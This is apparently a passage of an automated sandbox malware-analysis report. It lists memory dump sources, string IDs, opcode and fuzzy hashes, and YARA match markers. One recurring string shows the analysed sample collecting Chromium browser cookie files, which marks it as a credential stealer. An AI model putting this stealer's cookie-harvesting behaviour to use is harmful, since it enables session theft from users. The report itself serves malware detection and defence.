                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2151836215.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.2151836215.0000000000451000.00000040.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_5876.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: ' !"
                                                              • API String ID: 0-2098420348
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2152715201.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2120000_5876.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID: 0-3916222277
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2152715201.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2120000_5876.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID: IO
                                                              • API String ID: 0-3981347273
                                                              Strings
                                                              • w[info] collected cookies file of the chromium-based browser[info] collected cookies file of the chromium-based browser, xrefs: 02136A1A
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2152715201.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2120000_5876.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID: w[info] collected cookies file of the chromium-based browser[info] collected cookies file of the chromium-based browser
                                                              • API String ID: 0-808368384
                                                              Strings
                                                              • w[info] collected cookies file of the chromium-based browser[info] collected cookies file of the chromium-based browser, xrefs: 004167B3
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2151836215.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.2151836215.0000000000451000.00000040.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_5876.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: w[info] collected cookies file of the chromium-based browser[info] collected cookies file of the chromium-based browser
                                                              • API String ID: 0-808368384
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2152715201.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2120000_5876.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID: ' !"
                                                              • API String ID: 0-2098420348
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2151836215.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.2151836215.0000000000451000.00000040.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_5876.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: ' !"
                                                              • API String ID: 0-2098420348
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2152715201.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2120000_5876.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID: ,
                                                              • API String ID: 0-3772416878
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2151836215.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.2151836215.0000000000451000.00000040.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_5876.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: ,
                                                              • API String ID: 0-3772416878
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2152715201.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2120000_5876.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID: ' !"
                                                              • API String ID: 0-2098420348
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2151836215.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.2151836215.0000000000451000.00000040.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_5876.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: ' !"
                                                              • API String ID: 0-2098420348
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2151836215.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.2151836215.0000000000451000.00000040.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_5876.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 7452
                                                              • API String ID: 0-87867774
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2152715201.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2120000_5876.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID: gdeb
                                                              • API String ID: 0-1935535308
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2151836215.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.2151836215.0000000000451000.00000040.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_5876.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: gdeb
                                                              • API String ID: 0-1935535308
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2152715201.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2120000_5876.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID: gdeb
                                                              • API String ID: 0-1935535308
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2151836215.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.2151836215.0000000000451000.00000040.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_5876.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: gdeb
                                                              • API String ID: 0-1935535308
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2152715201.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2120000_5876.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID: gdeb
                                                              • API String ID: 0-1935535308
                                                              • Opcode ID: ab5ee23c0b9e442faf849c712f13f6a41f9d170253165c2487e789b6040976a7
                                                              • Instruction ID: 2fb34d29f84bfb0c5721e5f9dbff2e0520e8874a5d1ced695775b0fd4fd2f2d3
                                                              • Opcode Fuzzy Hash: ab5ee23c0b9e442faf849c712f13f6a41f9d170253165c2487e789b6040976a7
                                                              • Instruction Fuzzy Hash: 18114A74640B41CBE724CF15C4A0B3BB7E2EF49354F24499CC8BA07AA1C731A441CB54
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2152715201.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2120000_5876.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 2
                                                              • API String ID: 0-450215437
                                                              • Opcode ID: 30833ff814b8c550cf3d9a8c0408ccefebf08e62d8a20c99812e318a41ab620f
                                                              • Instruction ID: 35bd0ee9307108ec0e9759c1d437148a258ca54eba306ba5e6d58c1f4da65f6e
                                                              • Opcode Fuzzy Hash: 30833ff814b8c550cf3d9a8c0408ccefebf08e62d8a20c99812e318a41ab620f
                                                              • Instruction Fuzzy Hash: 922135715583408FD308CF18C89075BFBF1BB8A308F195D2DE99197341C779CA198B8A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2151836215.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.2151836215.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_5876.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 2
                                                              • API String ID: 0-450215437
                                                              • Opcode ID: 30833ff814b8c550cf3d9a8c0408ccefebf08e62d8a20c99812e318a41ab620f
                                                              • Instruction ID: f5e089a6dac0a0523a871d18e63b6fe0fba65fab962518bccecdf147c50fc5da
                                                              • Opcode Fuzzy Hash: 30833ff814b8c550cf3d9a8c0408ccefebf08e62d8a20c99812e318a41ab620f
                                                              • Instruction Fuzzy Hash: A82132715183408FD308CF18C8A075BFBF1AB86308F19592EE591A7281C779DA098B8A
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2152715201.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2120000_5876.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 85ad772fdc6384602ed72c736a1f825d3259b273080c1fcaf1cc121491fd9706
                                                              • Instruction ID: 6928d97b15101475db98ebf2177ef31ce9b61d83179c3c3b9c03d02cf80ab005
                                                              • Opcode Fuzzy Hash: 85ad772fdc6384602ed72c736a1f825d3259b273080c1fcaf1cc121491fd9706
                                                              • Instruction Fuzzy Hash: 4A4226316487218BC724DF18D88477AB3E1FFC4315F5A4A2DE9D683284E734E469CBA6
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2151836215.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.2151836215.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_5876.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: bcaaaa898dd430405192f2593a8c242fff0d109662e9fcd9ac7c861191fe7673
                                                              • Instruction ID: 6883325afc6f825635d626742d0a5d9e1835ed6dfc3da3a146eba26840d269f7
                                                              • Opcode Fuzzy Hash: bcaaaa898dd430405192f2593a8c242fff0d109662e9fcd9ac7c861191fe7673
                                                              • Instruction Fuzzy Hash: 2342E331608B128BC725DF18C98027BB3E1FFD4305F558A3ED9C5972C5EB39A8558B8A
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2152715201.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2120000_5876.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 89feb02c88a3de01d02269429ed4381ee90b1f5baaa96f21f345802269d3b6f1
                                                              • Instruction ID: 2cf7377c4674967c6740dda38ad1a0893a675499979fc4bd611ba86433c529aa
                                                              • Opcode Fuzzy Hash: 89feb02c88a3de01d02269429ed4381ee90b1f5baaa96f21f345802269d3b6f1
                                                              • Instruction Fuzzy Hash: 4152AD315087A18FC729CF29C09066AFBE1FF88314F048AADE4EA97751D739B959CB41
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2151836215.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.2151836215.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_5876.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 89feb02c88a3de01d02269429ed4381ee90b1f5baaa96f21f345802269d3b6f1
                                                              • Instruction ID: 12ad13480746c7cd18da11643994ea6d24d17646db99f27e8a3fd19327f066d4
                                                              • Opcode Fuzzy Hash: 89feb02c88a3de01d02269429ed4381ee90b1f5baaa96f21f345802269d3b6f1
                                                              • Instruction Fuzzy Hash: 0752AD715087418FC725CF29C08066BFBF5BF89315F148A6EE4CAA7391D738AA49CB49
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2152715201.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2120000_5876.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e91c7d2a63ee6c3dca2f18051dfa3e7c3a1a7594746a45bc65c84fa85c49771a
                                                              • Instruction ID: a39c402a6533ec3195fa8979ff991ea362bde5d81cefc0d0563e4077354248fb
                                                              • Opcode Fuzzy Hash: e91c7d2a63ee6c3dca2f18051dfa3e7c3a1a7594746a45bc65c84fa85c49771a
                                                              • Instruction Fuzzy Hash: 74424570554BA18FC328CF29C990A6ABBF1FF45310B518A2DE5A78BB90D735F858CB10
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2151836215.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.2151836215.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_5876.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8604de1e740987d2da87df556502dbd8f2af2340826d719865f64008384840b5
                                                              • Instruction ID: 3fbf906a6e00a3e3eb11de8ad5b4e3519518bfdadb8f6d2ee3f63df26050c825
                                                              • Opcode Fuzzy Hash: 8604de1e740987d2da87df556502dbd8f2af2340826d719865f64008384840b5
                                                              • Instruction Fuzzy Hash: 194236B0514B118FC368CF29C59056ABBF1FF95310B508A2EE6979BB90D739F845CB18
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2152715201.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2120000_5876.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 08b9dd238d8b45db2c247207ea78a481bf30ebad98789595c48e03aa40325cd9
                                                              • Instruction ID: c6a72d8cda6b0d7f7ae1c4fa06ff85a327a3ebba6b421a96375f4b83e366e12b
                                                              • Opcode Fuzzy Hash: 08b9dd238d8b45db2c247207ea78a481bf30ebad98789595c48e03aa40325cd9
                                                              • Instruction Fuzzy Hash: 1002D7356483908FCB18CF18C89075ABBE6EFC9304F09846DF8898B355DB75D919CB92
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2151836215.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.2151836215.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_5876.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: eb6bcd8756247e21f10be321729ab67892ae25bb834ccd5da0f3742629e4430c
                                                              • Instruction ID: d194efcc7ec7f4bd8fb84d2a24612c42db67142ebe129ef736fceb66be316be6
                                                              • Opcode Fuzzy Hash: eb6bcd8756247e21f10be321729ab67892ae25bb834ccd5da0f3742629e4430c
                                                              • Instruction Fuzzy Hash: EE02C6356083508FCB14CF18C88075BBBE2EFD5304F09886EF8899B396DA79D915CB96
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2151836215.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.2151836215.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_5876.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 07c576541fe366b73058be98e57c9bd2b12a3f8f82329be4f0b16747cfe1dd5b
                                                              • Instruction ID: 31c391565f000c2012c2e3157033306ea0d16efeb7ed1c8cee23eccb8bc6ddc9
                                                              • Opcode Fuzzy Hash: 07c576541fe366b73058be98e57c9bd2b12a3f8f82329be4f0b16747cfe1dd5b
                                                              • Instruction Fuzzy Hash: B902CCB4204B41CFC3208F29D890722BBF1BF5A305F18896DD58A8BB62D739F945CB95
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2152715201.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2120000_5876.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1cd7f54ce061a9ddafa4a214ace33e3eee76432edc0a9e8e077a74da1f6b516b
                                                              • Instruction ID: fde2b39c7f75b7e88fa4ac09a2549b26a27d3b4bc6f0aca58a56e1854507c1f5
                                                              • Opcode Fuzzy Hash: 1cd7f54ce061a9ddafa4a214ace33e3eee76432edc0a9e8e077a74da1f6b516b
                                                              • Instruction Fuzzy Hash: 2FD12B32E483714BC3148E28D89035BBBD7ABC5624F2B8A19F8E857395D3799C198BD1
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2151836215.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.2151836215.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_5876.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1cd7f54ce061a9ddafa4a214ace33e3eee76432edc0a9e8e077a74da1f6b516b
                                                              • Instruction ID: da991093c7ac858ecdfb44603c9bd26de7c8ee4ba14a14c77b9ecd73924d3886
                                                              • Opcode Fuzzy Hash: 1cd7f54ce061a9ddafa4a214ace33e3eee76432edc0a9e8e077a74da1f6b516b
                                                              • Instruction Fuzzy Hash: 9FD11B72F087514BC3148E29C980257BBE2AFD5320F29862EE8D9673D6DA7C9C458BC5
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2152715201.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2120000_5876.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ea0677f270df709b1f7eb94a631cbec65cf770ef0d0ccab117a7daa6e435e835
                                                              • Instruction ID: 29409273e311fdef9a8656c17ae5d9cc37604059f4c414ff5a8cf5762f3859a9
                                                              • Opcode Fuzzy Hash: ea0677f270df709b1f7eb94a631cbec65cf770ef0d0ccab117a7daa6e435e835
                                                              • Instruction Fuzzy Hash: 5381B4715483828FD725DF14C890BAFB7E2BF89314F08592DD899C7281EB799845CF92
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2151836215.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.2151836215.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_5876.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3ceb3a9039a7e6e79f1b06a6bcad479347d8d9957a5cee3c326a915ae843bccb
                                                              • Instruction ID: 19774dfa9ffd53452cd0f78b2a7fa6416411b38c3c6d0e634cb70a42d69f586e
                                                              • Opcode Fuzzy Hash: 3ceb3a9039a7e6e79f1b06a6bcad479347d8d9957a5cee3c326a915ae843bccb
                                                              • Instruction Fuzzy Hash: 5781C3719087828FC725CF14C8907AFB7E1BF99304F08592DE899C7391E7789885CB96
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2152715201.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2120000_5876.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: acfbc8068afc6b7d88dba9d73b7b1bf6863cfdde9a5a5678ccf86eeeb0158c18
                                                              • Instruction ID: c27bfb5a9153b8bd749d58b903e2daaa5d119935e2cd84c2b87d044abd965fdf
                                                              • Opcode Fuzzy Hash: acfbc8068afc6b7d88dba9d73b7b1bf6863cfdde9a5a5678ccf86eeeb0158c18
                                                              • Instruction Fuzzy Hash: B1616DB1A087508FE318DF29D89475BBBE1BBC8358F044A6DE5E587350D379D5088F92
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2151836215.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.2151836215.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_5876.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: acfbc8068afc6b7d88dba9d73b7b1bf6863cfdde9a5a5678ccf86eeeb0158c18
                                                              • Instruction ID: 8011320ac73b754884be16ecadefcb7f33d37dbd2e6123a62891b597907d0779
                                                              • Opcode Fuzzy Hash: acfbc8068afc6b7d88dba9d73b7b1bf6863cfdde9a5a5678ccf86eeeb0158c18
                                                              • Instruction Fuzzy Hash: 40617CB16087549FE314DF29D49435BBBE1BBC8318F044A2EE4D987390E379DA088B96
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2152715201.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2120000_5876.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c20bdc7a851645dbf9dab95978a4bc77b7dd27bd65b083cf309054b351127529
                                                              • Instruction ID: c781bf70a22a8f70ffa7a84ae3bdf2109fb5b1d6e8858050012f1ae4529050fc
                                                              • Opcode Fuzzy Hash: c20bdc7a851645dbf9dab95978a4bc77b7dd27bd65b083cf309054b351127529
                                                              • Instruction Fuzzy Hash: 165190716087418FC718CF28C89062AB7E1BFC9324F154B2DE8EA97395DB34E955CB52
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2152715201.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2120000_5876.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 44613b4c036b2c385d58573518babc9526f5992cc62a53f54369211b96f0fe89
                                                              • Instruction ID: 12351b0937c4fd47ccaa82045fa084f712df019102c3123f03e6b575427833a9
                                                              • Opcode Fuzzy Hash: 44613b4c036b2c385d58573518babc9526f5992cc62a53f54369211b96f0fe89
                                                              • Instruction Fuzzy Hash: 275123B294C2148FDB22DF28CC8477AB7E5EF45314F09566CD89AC7281E739D948C792
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2151836215.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000007.00000002.2151836215.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_400000_5876.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 83073b8719d7e0faf081a3368ce39582620720279ac6267d65c12e9389d1ea24
                                                              • Instruction ID: ac486eaa269052dcc2a7b9b78249461c6c086f42b689fd4a8c42a324ff056cec
                                                              • Opcode Fuzzy Hash: 83073b8719d7e0faf081a3368ce39582620720279ac6267d65c12e9389d1ea24
                                                              • Instruction Fuzzy Hash: F351F5B29186148FC720DF28CC857BAB7E4DF92318F09552ED869C7381E739D884C7A5
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2152715201.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2120000_5876.jbxd
                                                              Yara matches
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2152378881.000000000079D000.00000040.00000020.00020000.00000000.sdmp, Offset: 0079D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_79d000_5876.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 84637ed40dc845524da0f22a5c459a29830c068504c1783cee47edcb1d8e9528
                                                              • Instruction ID: 9c25957a02b0c50e1544ebe2d71411fe246a90e6a9f0a21d5aaf03be7ac13e80
                                                              • Opcode Fuzzy Hash: 84637ed40dc845524da0f22a5c459a29830c068504c1783cee47edcb1d8e9528
                                                              • Instruction Fuzzy Hash: 4BD0C962A492CA8ED3128B31818ABD1BFD5AF52200B1E55EAC0E44E456C1289085DF21
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2152715201.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2120000_5876.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: cc8df1d88a68718305d81cb7bbe64538c0baeb9b6a0cc46f2b02e3b4a1a8a6cf
                                                              • Instruction ID: 699feb5ee3d94f7cfc0a453b2fe9a3727c550fe2d3f5ff42bb8cfa63ada4f839
                                                              • Opcode Fuzzy Hash: cc8df1d88a68718305d81cb7bbe64538c0baeb9b6a0cc46f2b02e3b4a1a8a6cf
                                                              • Instruction Fuzzy Hash: D6A00238A4550187D104DF00D690475B335738B501B50B154D615231568B60D401C55C
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2152715201.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2120000_5876.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 03f580e30a6611fca79c1431b30a1db64368cf35633a261591e3f40f90ed873e
                                                              • Instruction ID: 3ef96da8efbfa169e98678a181f5cf30cbc18a4f7711341d604041cc041c4401
                                                              • Opcode Fuzzy Hash: 03f580e30a6611fca79c1431b30a1db64368cf35633a261591e3f40f90ed873e
                                                              • Instruction Fuzzy Hash: C5A0022DD8A042DD81301FBA55142B4E3B99BC7321F59B865511C330614971D401C56D
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2152715201.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2120000_5876.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Object$DeleteSelect
                                                              • String ID: $(ID$07D$07D$07D$07D$07D$07D$07D$07D$07D$07D$07D$07D$07D$07D$4ID$@ID$LID$XID$dID$pID$|ID$HD$HD
                                                              • API String ID: 618127014-763545205
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2152715201.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_2120000_5876.jbxd
                                                              Yara matches
                                                              Similarity
